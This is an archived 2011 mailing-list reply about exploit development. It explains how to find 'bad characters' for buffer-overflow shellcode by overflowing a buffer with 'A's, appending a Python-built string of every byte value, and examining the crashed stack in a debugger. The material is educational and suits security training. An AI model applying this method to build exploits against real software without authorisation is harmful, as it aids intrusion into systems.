Security Basics mailing list archives
RE: Finding Bad Characters in Exploit Research?
From: "Demetris Papapetrou" <dpapapetrou () internalaudit gov cy>
Date: Fri, 11 Mar 2011 11:48:23 +0200
Hi John, I apologize for the delayed response. I was hoping that someone more experienced in the field of buffer overflows would answer your question. Since no one mentioned an easy way to detect bad characters, I have decided to provide you with the one I use (manual work required). Let's say that the buffer you are trying to overflow has a size of 512 bytes and when you successfully overflow it you have an extra space of 512 bytes after it. Let's say that EIP is overwritten at bytes 514-517. So in order to detect which characters may break your shellcode, you overflow the buffer with 520 * A and then you insert into the extra space the hex representation of all 256 ASCII characters. Python extract -------------- # Bad characters (hex representation of all 256 ascii characters) #buffer = '\x41' * 520 #buffer += "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x1 3\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x2 6\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x3 9\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4 c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5 f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x7 2\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x8 5\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x9 8\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xa b\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xb e\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd 1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe 4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf 7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" Now, when the buffer overflow happens and EIP is overwritten with AAAA, Olly/Immunity debugger will through an exception and pause program execution. At this point you need to observe the stack and find your sting of As. After the long string of As you should find the sting of 256 ASCII characters. If there is a bad character in it, the sting won't be 256 characters long. Its length will usually be one character less than the position of the offending character. For example, the characters \x0a and \x0d are usually marked as bad because they are the Line Feed (LF) and carriage return (CR) characters and signify the end of a command (e.g. the FTP USER command issued during the authentication phase). So if we observer the stack of the FTP application during the crash, the string of ASCII characters following the string of As will be \x01\x02\x03\x04\x05\x06\x07\x08\x09, which means that the next character in the sting (i.e. \x0a) is a bad one. Please note that, following the identification of a bad character you need to perform the same procedure again and again, but each time removing the offending character from the ASCII string. Hence in our second attempt the ASCII string that we will find in the stack will be \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c, which signifies that the next bad character is \x0d. Note that in this string there is no \x0a because the ASCII string sent to the program was 255 characters long instead of 256 (\x0a was removed from the string). I hope I helped. Regards, Demetris Papapetrou -----Original Message----- From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of John Nash Sent: Thursday, February 17, 2011 6:36 PM To: security-basics Subject: Finding Bad Characters in Exploit Research? Hello All, Just dived into exploit research and finding bad characters is killing me! Can someone point me to a good document / methodology / automated way to find bad characters? Any help will be greatly appreciated! Rgds, JN ------------------------------------------------------------------------ Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727 d1 ------------------------------------------------------------------------ ------------------------------------------------------------------------ Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ------------------------------------------------------------------------
Current thread:
- RE: Finding Bad Characters in Exploit Research? Demetris Papapetrou (Mar 11)
- RE: Finding Bad Characters in Exploit Research? Peter Van Eeckhoutte (Mar 11)